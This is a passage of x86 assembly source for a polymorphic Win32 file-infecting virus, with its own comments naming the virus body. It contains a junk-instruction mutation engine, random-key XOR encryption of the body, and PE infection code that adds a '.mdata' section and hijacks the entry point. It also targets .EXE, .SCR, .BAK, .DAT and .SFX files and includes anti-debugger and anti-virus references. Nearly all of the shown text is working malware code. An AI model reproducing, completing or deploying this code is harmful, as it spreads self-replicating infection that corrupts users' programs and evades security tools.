in al, 40h
and al, 1
je _test_
mov al, 0bh ;OR reg, reg
jmp _write
_test_: mov al, 85h ;TEST reg, reg
_write: mov byte ptr [ebx + @6-1], al ;store it
pop eax
lea edi, [ebx + @6]
mov al, [edi]
and al, 11000000b
add al, dl
ror al, 3
add al, dl
rol al, 3
stosb
rep_3: call get_reg ;get random register
cmp al, dl ;mustnt be previous register
je rep_3
cmp al, dh
je rep_3
cmp al, 101b ;mustnt be EBP
je rep_3 ;(due to instr. incompatibility)
mov dl, al
lea edi, [ebx + @3]
mov al, [edi]
and al, 11000111b
ror al, 3
add al, dl
rol al, 3
stosb
lea edi, [ebx + @7]
call mask_it
lea edi, [ebx + @8]
call mask_it
lea esi, [ebx + junx]
gen_j: lodsd ;junk instructions generator
xchg eax, ecx
jecxz end_mutate
mov edi, ecx
add edi, ebx
xor eax, eax
in al, 40h
and al, 1
je _2&1_
push esi
lea esi, [ebx + junx3]
in al, 40h
and al, num_junx3-1
add esi, eax
movsb
movsb
in al, 40h
stosb
jmp _gen_j
_2&1_: push esi
in al, 40h
and al, 1
je twofirst
call one_byte
call two_byte
jmp _gen_j
twofirst:
call two_byte
call one_byte
_gen_j: pop esi
jmp gen_j
end_mutate:
popad
push eax
in al, 40h ;create 32bit key
mov ah, al
in al, 40h
shl eax, 16
in al, 40h
mov ah, al
in al, 40h
mov dword ptr [ebx + key], eax ;store it
push edi
mov edx, (virus_end-Start+3)/4 ;copy virus body to internal
lea esi, [ebx + Start] ;buffer
mov ecx, edx
lea edi, [ebx + buffer]
rep movsd
xor ecx, ecx
lea esi, [ebx + buffer - Start + encrypted]
crypt: xor [esi], eax ;encrypt virus body
add esi, 4
inc ecx
cmp ecx, (virus_end-encrypted+3)/4
jne crypt
pop edi
pop eax
lea esi, [ebx + buffer]
mov ecx, edx
inc dword ptr [ebx + GenerationCount] ;increment generation count
rep movsd ;copy virus
mov [ebx + Entrypoint], eax ;restore variable after
mov al, 3 ;copy stage
jmp if_n
err_InfectFile:
mov al, 4
mov [ebx + nclosefile_mode], al ;dendrit
if_n: mov [ebx + nClF_synapse], offset pfNeuron_InfectFile ;synapse
push [ebx + pfNeuron_CloseFile]
call [ebx + ddSwitchToFiber] ;switch to neuron
end_InfectFile:
push [ebx + WFD.WFD_dwFileAttributes]
lea esi, [ebx + WFD.WFD_szFileName]
push esi
call [ebx + ddSetFileAttributesA] ;set back file attributes
end_IF: push [ebx + dwThreadID]
nIF_synapse = dword ptr $ - 4
call [ebx + ddSwitchToFiber] ;jump to previous neuron
jmp n_infectfile
NextWayOfInfection: ;create new section
mov edi, edx
inc word ptr [edi.NT_FileHeader.FH_NumberOfSections]
mov eax, [esi.SH_VirtualAddress - x]
add eax, [esi.SH_VirtualSize - x]
mov ecx, [edi.NT_OptionalHeader.OH_SectionAlignment]
cdq
div ecx
test edx, edx
je next_1
inc eax
next_1: mul ecx
mov [ebx + s_RVA], eax ;new RVA
mov ecx, [ebx + Entrypoint]
push ecx
push [edi.NT_OptionalHeader.OH_AddressOfEntryPoint]
pop [ebx + Entrypoint]
mov [edi.NT_OptionalHeader.OH_AddressOfEntryPoint], eax ;new EP
mov ecx, [edi.NT_OptionalHeader.OH_FileAlignment]
mov eax, virtual_end - Start
div ecx
inc eax
mul ecx
mov [ebx + s_RAWSize], eax ;new SizeOfRawData
add [edi.NT_OptionalHeader.OH_SizeOfImage], eax
;new SizeOfImageBase
mov ecx, [ebx + WFD.WFD_nFileSizeLow]
mov [ebx + s_RAWPtr], ecx ;new PointerToRawData
push ecx
mov edi, esi
lea esi, [ebx + new_section]
mov ecx, (IMAGE_SIZEOF_SECTION_HEADER+3)/4
rep movsd ;copy section
pop ecx
pop eax
jmp copy_virus ;and copy virus body
ni_seh: @SEH_RemoveFrame ;remove SEH frame
popad
jmp end_IF
Neuron_InfectFile EndP
;-------------------------------------------------------------------------------
one_byte:
lea esi, [ebx + junx1]
in al, 40h
and al, num_junx1-1
add esi, eax
movsb
ret
two_byte:
lea esi, [ebx + junx2]
in al, 40h
and al, num_junx2-1
add esi, eax
movsb
in al, 40h
and al, 7
add al, 11000000b
stosb
ret
get_reg:
in al, 40h
and al, 7
je get_reg
cmp al, 4
je get_reg
ret
mask_it:
mov al, [edi]
and al, 11111000b
add al, dl
stosb
ret
;-------------------------------------------------------------------------------
Neuron_Addresses: dd offset Neuron_Main
dd offset Neuron_Debugger
dd offset Neuron_FindFile
dd offset Neuron_CheckFile
dd offset Neuron_OpenFile
dd offset Neuron_CloseFile
dd offset Neuron_InfectFile
num_of_neurons = (byte ptr $ - offset Neuron_Addresses) / 4
junx1: nop
dec eax
cmc
inc eax
clc
cwde
stc
lahf
num_junx1 = 8
junx2: db 8bh ;mov ..., ...
db 03h ;add ..., ...
db 13h ;adc ..., ...
db 2dh ;sub ..., ...
db 1bh ;sbb ..., ...
db 0bh ;or ..., ...
db 33h ;xor ..., ...
db 23h ;and ..., ...
db 33h ;test ..., ...
num_junx2 = 9
junx3: db 0c1h, 0c0h ;rol eax, ...
db 0c1h, 0e0h ;shl eax, ...
db 0c1h, 0c8h ;ror eax, ...
db 0c1h, 0e8h ;shr eax, ...
db 0c1h, 0d0h ;rcl eax, ...
db 0c1h, 0f8h ;sar eax, ...
db 0c1h, 0d8h ;rcr eax, ...
num_junx3 = 7
junx: irp Num, <1,2,3,4,5,6,7,8,9>
dd offset @j&Num
endm
dd 0
GenerationCount dd ?
Entrypoint dd offset ExitProcess - 400000h
szExe db '*.EXE', 0
szScr db '*.SCR', 0
szBak db '*.BAK', 0
szDat db '*.DAT', 0
szSfx db '*.SFX', 0
num_of_exts = 5
dotdot db '..', 0
dtavTBAV db 'anti-vir.dat', 0
string_subs: ;string substitutes
db 'File', 0
db 'Get', 0
db 'Set', 0
db 'Module', 0
db 'Handle', 0
db 'Create', 0
db 'Find', 0
db 'Close', 0
db 'ViewOf', 0
db 'CurrentDirectoryA', 0
db 'Fiber', 0
db 'Thread', 0
db 'Delete', 0
db 'Library', 0
new_section:
s_name db '.mdata', 0, 0
s_vsize dd virtual_end - Start
s_RVA dd 0
s_RAWSize dd 0
s_RAWPtr dd 0
dd 0, 0, 0
s_flags dd 0e0000000h
virus_end:
strings:
szKernel32 db 'KERNEL32', 0
szKernel32W dw 'K','E','R','N','E','L','3','2', 0
szUser32 db 'USER32', 0
szGetModuleHandleA db 'GetModuleHandleA', 0
szGetModuleHandleW db 'GetModuleHandleW', 0
szAPIs:
szCreateThread db 'CreateThread', 0
szWaitForSingleObject db 'WaitForSingleObject', 0
szCloseHandle db 'CloseHandle', 0
szConvertThreadToFiber db 'ConvertThreadToFiber', 0
szCreateFiber db 'CreateFiber', 0
szSwitchToFiber db 'SwitchToFiber', 0
szDeleteFiber db 'DeleteFiber', 0
szGetVersion db 'GetVersion', 0
szFindFirstFileA db 'FindFirstFileA', 0
szFindNextFileA db 'FindNextFileA', 0
szFindClose db 'FindClose', 0
szCreateFileA db 'CreateFileA', 0
szCreateFileMappingA db 'CreateFileMappingA', 0
szMapViewOfFile db 'MapViewOfFile', 0
szUnmapViewOfFile db 'UnmapViewOfFile', 0
szSetFileAttributesA db 'SetFileAttributesA', 0
szSetFilePointer db 'SetFilePointer', 0
szSetEndOfFile db 'SetEndOfFile', 0
szSetFileTime db 'SetFileTime', 0
szGetCurrentDirectoryA db 'GetCurrentDirectoryA', 0
szSetCurrentDirectoryA db 'SetCurrentDirectoryA', 0
szDeleteFileA db 'DeleteFileA', 0
szLoadLibraryA db 'LoadLibraryA', 0
szFreeLibraryA db 'FreeLibrary', 0
szIsDebuggerPresent db 'IsDebuggerPresent', 0
db 0ffh
ddAPIs:
ddCreateThread dd ?
ddWaitForSingleObject dd ?
ddCloseHandle dd ?
ddConvertThreadToFiber dd ?
ddCreateFiber dd ?
ddSwitchToFiber dd ?
ddDeleteFiber dd ?
ddGetVersion dd ?
ddFindFirstFileA dd ?
ddFindNextFileA dd ?
ddFindClose dd ?
ddCreateFileA dd ?
ddCreateFileMappingA dd ?
ddMapViewOfFile dd ?
ddUnmapViewOfFile dd ?
ddSetFileAttributesA dd ?
ddSetFilePointer dd ?
ddSetEndOfFile dd ?
ddSetFileTime dd ?
ddGetCurrentDirectoryA dd ?
ddSetCurrentDirectoryA dd ?
ddDeleteFileA dd ?
ddLoadLibraryA dd ?
ddFreeLibraryA dd ?
ddIsDebuggerPresent dd ?
dwThreadID dd ?
Fiber_Addresses:
pfMain dd ?
pfNeuron_Main dd ?
pfNeuron_Debugger dd ?
pfNeuron_FindFile dd ?
pfNeuron_CheckFile dd ?
pfNeuron_OpenFile dd ?
pfNeuron_CloseFile dd ?
pfNeuron_InfectFile dd ?
hFile dd ?
hMapFile dd ?
lpFile dd ?
SearchHandle dd ?
CurDir db MAX_PATH dup (?)
WFD WIN32_FIND_DATA ?
buffer db virus_end - Start + 1 dup (?)
virtual_end:
_GetModuleHandleA dd offset GetModuleHandleA
_GetModuleHandleW dd offset GetModuleHandleW
ends
End Start